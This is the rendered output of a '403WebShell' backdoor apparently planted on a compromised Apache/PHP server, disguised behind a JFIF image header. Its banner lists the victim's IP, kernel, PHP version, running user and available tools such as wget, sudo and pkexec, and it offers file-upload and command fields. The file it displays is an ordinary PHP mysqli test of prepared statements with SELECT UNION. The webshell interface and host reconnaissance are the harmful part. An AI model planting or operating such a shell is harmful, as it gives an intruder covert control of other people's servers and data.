????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.55
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/mysqli/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/mysqli/tests/mysqli_ps_select_union.phpt
--TEST--
Prepared Statements and SELECT UNION
--SKIPIF--
<?php
require_once('skipif.inc');
require_once('skipifemb.inc');
require_once('skipifconnectfailure.inc');
?>
--FILE--
<?php
	require_once("connect.inc");
	require_once("table.inc");

	// Regular (non-prepared) queries
	print "Using CAST('somestring' AS CHAR)...\n";
	if (!($res = $link->query("SELECT CAST('one' AS CHAR) AS column1 UNION SELECT CAST('three' AS CHAR) UNION SELECT CAST('two' AS CHAR)")))
		printf("[001] [%d] %s\n", $link->errno, $link->error);

	$data = array();
	while ($row = $res->fetch_assoc()) {
		$data[] = $row['column1'];
		var_dump($row['column1']);
	}
	$res->free();

	// Prepared Statements
	if (!($stmt = $link->prepare("SELECT CAST('one' AS CHAR) AS column1 UNION SELECT CAST('three' AS CHAR) UNION SELECT CAST('two' AS CHAR)")))
		printf("[002] [%d] %s\n", $link->errno, $link->error);

	$column1 = null;
	if (!$stmt->execute() || !$stmt->bind_result($column1))
		printf("[003] [%d] %s\n", $stmt->errno, $stmt->error);

	$index = 0;
	while ($stmt->fetch()) {
		if ($data[$index] != $column1) {
			printf("[004] Row %d, expecting %s/%s got %s/%s\n",
				$index + 1, gettype($data[$index]), $data[$index], gettype($column1), $column1);
		}
		$index++;
	}
	$stmt->close();

	if ($IS_MYSQLND) {
		/*
		Advantage mysqlnd -
		The metadata mysqlnd has available after prepare is better than
		the one made available by the MySQL Client Library (libmysql).
		"libmysql" will give wrong results and that is OK -
		http://bugs.mysql.com/bug.php?id=47483
		*/
		if (!($stmt = $link->prepare("SELECT CAST('one' AS CHAR) AS column1 UNION SELECT CAST('three' AS CHAR) UNION SELECT CAST('two' AS CHAR)")))
			printf("[005] [%d] %s\n", $link->errno, $link->error);

		$column1 = null;
		/* Note: bind_result before execute */
		if (!$stmt->bind_result($column1) || !$stmt->execute())
			printf("[006] [%d] %s\n", $stmt->errno, $stmt->error);

		$index = 0;
		while ($stmt->fetch()) {
			if ($data[$index] != $column1) {
				printf("[007] Row %d, expecting %s/%s got %s/%s\n",
					$index + 1, gettype($data[$index]), $data[$index], gettype($column1), $column1);
			}
			$index++;
		}
		$stmt->close();
	}

	// Regular (non-prepared) queries
	print "Mixing CAST('somestring'AS CHAR), integer and CAST(integer AS CHAR)...\n";
	if (!($res = $link->query("SELECT 1 AS column1 UNION SELECT CAST('three' AS CHAR) UNION SELECT CAST(2 AS CHAR)")))
		printf("[008] [%d] %s\n", $link->errno, $link->error);

	$data = array();
	while ($row = $res->fetch_assoc()) {
		$data[] = $row['column1'];
	}
	$res->free();

	// Prepared Statements
	if (!($stmt = $link->prepare("SELECT 1 AS column1 UNION SELECT CAST('three' AS CHAR) UNION SELECT CAST(2 AS CHAR)")))
		printf("[009] [%d] %s\n", $link->errno, $link->error);

	$column1 = null;
	if (!$stmt->execute() || !$stmt->bind_result($column1))
		printf("[010] [%d] %s\n", $stmt->errno, $stmt->error);

	$index = 0;
	while ($stmt->fetch()) {
		if ($data[$index] != $column1) {
			printf("[011] Row %d, expecting %s/%s got %s/%s\n",
				$index + 1, gettype($data[$index]), $data[$index], gettype($column1), $column1);
		}
		var_dump($column1);
		$index++;
	}
	$stmt->close();

	if ($IS_MYSQLND) {
		/* Advantage mysqlnd - see above... */
		if (!($stmt = $link->prepare("SELECT 1 AS column1 UNION SELECT CAST('three' AS CHAR) UNION SELECT CAST(2 AS CHAR)")))
			printf("[012] [%d] %s\n", $link->errno, $link->error);

		$column1 = null;
		if (!$stmt->bind_result($column1) || !$stmt->execute())
			printf("[013] [%d] %s\n", $stmt->errno, $stmt->error);

		$index = 0;
		while ($stmt->fetch()) {
			if ($data[$index] != $column1) {
				printf("[014] Row %d, expecting %s/%s got %s/%s\n",
					$index + 1, gettype($data[$index]), $data[$index], gettype($column1), $column1);
			}
			$index++;
		}
		$stmt->close();
	}

	print "Using integer only...\n";
	if (!($res = $link->query("SELECT 1 AS column1 UNION SELECT 303 UNION SELECT 2")))
		printf("[015] [%d] %s\n", $link->errno, $link->error);

	$data = array();
	while ($row = $res->fetch_assoc()) {
		$data[] = $row['column1'];
	}
	$res->free();

	// Prepared Statements
	if (!($stmt = $link->prepare("SELECT 1 AS column1 UNION SELECT 303 UNION SELECT 2")))
		printf("[016] [%d] %s\n", $link->errno, $link->error);

	$column1 = null;
	if (!$stmt->execute() || !$stmt->bind_result($column1))
		printf("[017] [%d] %s\n", $stmt->errno, $stmt->error);

	$index = 0;
	while ($stmt->fetch()) {
		if ($data[$index] != $column1) {
			printf("[018] Row %d, expecting %s/%s got %s/%s\n",
				$index + 1, gettype($data[$index]), $data[$index], gettype($column1), $column1);
		}
		var_dump($column1);
		$index++;
	}
	$stmt->close();

	if ($IS_MYSQLND) {
		/* Advantage mysqlnd - see above */
		if (!($stmt = $link->prepare("SELECT 1 AS column1 UNION SELECT 303 UNION SELECT 2")))
			printf("[019] [%d] %s\n", $link->errno, $link->error);

		$column1 = null;
		if (!$stmt->bind_result($column1) || !$stmt->execute())
			printf("[020] [%d] %s\n", $stmt->errno, $stmt->error);

		$index = 0;
		while ($stmt->fetch()) {
			if ($data[$index] != $column1) {
				printf("[021] Row %d, expecting %s/%s got %s/%s\n",
					$index + 1, gettype($data[$index]), $data[$index], gettype($column1), $column1);
			}
			$index++;
		}
		$stmt->close();
	}

	print "Testing bind_param(), strings only...\n";
	$two = 'two';
	$three = 'three';
	if (!($stmt = $link->prepare("SELECT 'one' AS column1 UNION SELECT ? UNION SELECT ?")))
		printf("[022] [%d] %s\n", $stmt->errno, $stmt->error);

	$column1 = null;
	if (!$stmt->bind_param('ss', $three, $two) || !$stmt->execute() || !$stmt->bind_result($column1))
		printf("[023] [%d] %s\n", $stmt->errno, $stmt->error);

	$index = 0;
	$data = array();
	while ($stmt->fetch()) {
		$data[$index++] = $column1;
		var_dump($column1);
	}
	$stmt->close();

	if ($IS_MYSQLND) {
		/* Advantage mysqlnd - see above */
		$two = 'two';
		$three = 'three';
		if (!($stmt = $link->prepare("SELECT 'one' AS column1 UNION SELECT ? UNION SELECT ?")))
			printf("[024] [%d] %s\n", $stmt->errno, $stmt->error);

		$column1 = null;
		if (!$stmt->bind_param('ss', $three, $two) || !$stmt->bind_result($column1) || !$stmt->execute())
			printf("[025] [%d] %s\n", $stmt->errno, $stmt->error);

		$index = 0;
		while ($stmt->fetch()) {
			if ($data[$index] != $column1) {
				printf("[26] Row %d, expecting %s/%s, got %s/%s\n",
					$index + 1, gettype($data[$index]), $data[$index], gettype($column1), $column1);
			}
			$index++;
		}
		$stmt->close();
	}

	print "Testing bind_param(), strings only, with CAST AS CHAR...\n";
	$two = 'two';
	$three = 'three beers are more than enough';
	if (!($stmt = $link->prepare("SELECT CAST('one' AS CHAR) AS column1 UNION SELECT CAST(? AS CHAR) UNION SELECT CAST(? AS CHAR)")))
		printf("[027] [%d] %s\n", $stmt->errno, $stmt->error);

	$column1 = null;
	if (!$stmt->bind_param('ss', $three, $two) || !$stmt->execute() || !$stmt->bind_result($column1))
		printf("[028] [%d] %s\n", $stmt->errno, $stmt->error);

	$index = 0;
	$data = array();
	while ($stmt->fetch()) {
		$data[$index++] = $column1;
		var_dump($column1);
	}
	$stmt->close();

	if ($IS_MYSQLND) {
		/* Advantage mysqlnd - see above */
		$two = 'two';
		$three = 'three beers are more than enough';
		if (!($stmt = $link->prepare("SELECT CAST('one' AS CHAR) AS column1 UNION SELECT CAST(? AS CHAR) UNION SELECT CAST(? AS CHAR)")))
			printf("[029] [%d] %s\n", $stmt->errno, $stmt->error);

		$column1 = null;
		if (!$stmt->bind_param('ss', $three, $two) || !$stmt->bind_result($column1) || !$stmt->execute())
			printf("[030] [%d] %s\n", $stmt->errno, $stmt->error);

		$index = 0;
		while ($stmt->fetch()) {
			if ($data[$index] != $column1) {
				printf("[31] Row %d, expecting %s/%s, got %s/%s\n",
					$index + 1, gettype($data[$index]), $data[$index], gettype($column1), $column1);
			}
			$index++;
		}
		$stmt->close();
	}

	$link->close();

	print "done!";
?>
--EXPECTF--
Using CAST('somestring' AS CHAR)...
%unicode|string%(3) "one"
%unicode|string%(5) "three"
%unicode|string%(3) "two"
Mixing CAST('somestring'AS CHAR), integer and CAST(integer AS CHAR)...
%unicode|string%(1) "1"
%unicode|string%(5) "three"
%unicode|string%(1) "2"
Using integer only...
int(1)
int(303)
int(2)
Testing bind_param(), strings only...
%unicode|string%(3) "one"
%unicode|string%(5) "three"
%unicode|string%(3) "two"
Testing bind_param(), strings only, with CAST AS CHAR...
%unicode|string%(3) "one"
%unicode|string%(32) "three beers are more than enough"
%unicode|string%(3) "two"
done!

Youez - 2016 - github.com/yon3zu
LinuXploit